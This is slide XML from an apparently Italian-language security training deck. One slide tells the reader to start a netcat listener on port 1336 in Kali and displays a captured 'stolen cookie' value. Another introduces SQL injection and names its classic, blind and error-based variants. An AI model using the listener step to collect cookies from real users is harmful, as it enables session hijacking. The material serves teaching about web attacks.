              <a:t>A questo punto andare nel terminale della nostra Kali e digitare i comandi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>nc -l -p</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>, nel mio caso ho scelto la porta </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>1336</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Dall’immagine sopra possiamo evincere il “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>cookie rubato”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> è </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>ea0c27f46efe92b303e236ad7ec31a6e</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="3900079" y="5884893"/>
            <a:ext cx="14387921" cy="4402107"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="19183895" cy="5869476"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 3" id="3"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="0" t="19250" r="0" b="19250"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="19183895" cy="5869476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10787271" y="-1626108"/>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3">
              <a:alphaModFix amt="15000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 5" id="5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="363496"/>
            <a:ext cx="402082" cy="40208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7" id="7"/>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8" id="8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="5884893"/>
            <a:ext cx="4011091" cy="4402107"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="892035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 9" id="9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="812800" cy="892035"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="892035" w="812800">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="812800" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="812800" y="892035"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="892035"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 10" id="10"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="812800" cy="920610"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="16337817" y="4716742"/>
            <a:ext cx="782032" cy="3118333"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="2218746"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 12" id="12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="556429" cy="2218746"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="2218746" w="556429">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="556429" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="556429" y="2218746"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2218746"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A">
                <a:alpha val="74902"/>
              </a:srgbClr>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 13" id="13"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="556429" cy="2247321"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="3547372"/>
            <a:ext cx="1618141" cy="99952"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1151334" cy="71118"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 15" id="15"/>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16" id="16"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="2894898"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 18" id="18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 19" id="19"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>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9144000" y="3710682"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 22" id="22"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>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3693076" y="2894898"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 25" id="25"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>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3693076" y="3710682"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 27" id="27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 28" id="28"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2659"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 29" id="29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9144000" y="4384597"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 30" id="30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 31" id="31"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2659"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 32" id="32"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="13693076" y="4384597"/>
            <a:ext cx="157371" cy="153180"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="150670" cy="146657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 33" id="33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="150670" cy="146657"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="146657" w="150670">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="150670" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150670" y="146657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="146657"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 34" id="34"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-57150"/>
              <a:ext cx="150670" cy="203807"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2659"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 35" id="35"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="16030399" y="456026"/>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36" id="36"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="456026"/>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12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 37" id="37"/>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38" id="38"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="519925" y="1838398"/>
            <a:ext cx="6588969" cy="1758950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5000">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>Sql injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 39" id="39"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="196015" y="6242097"/>
            <a:ext cx="3619060" cy="3722878"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2170"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1299">
                <a:solidFill>
                  <a:srgbClr val="272626"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>La SQL Injection (SQLi) è una vulnerabilità di sicurezza che consente a un utente malintenzionato di interferire con le query SQL che un'applicazione invia al suo database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2170"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1299">
                <a:solidFill>
                  <a:srgbClr val="272626"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Questa vulnerabilità permette all'attaccante di visualizzare dati che normalmente non sarebbe autorizzato a vedere. In molti casi, l'attaccante può modificare o eliminare questi dati, causando un danno significativo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2170"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1299">
                <a:solidFill>
                  <a:srgbClr val="272626"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Nei casi più gravi, la SQL Injection può consentire all'attaccante di eseguire comandi amministrativi sul database, come eliminare tabelle o addirittura compromettere l'intero server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 40" id="40"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9470271" y="2816019"/>
            <a:ext cx="2337490" cy="580103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Classica (Classic SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 41" id="41"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9470271" y="3631803"/>
            <a:ext cx="2337490" cy="282442"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Blind</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 42" id="42"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="13929133" y="2795669"/>
            <a:ext cx="3321209" cy="580103"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2413"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1724">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Iniezione SQL Basata su Errori (Error-based SQL Injection)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 43" id="43"/>
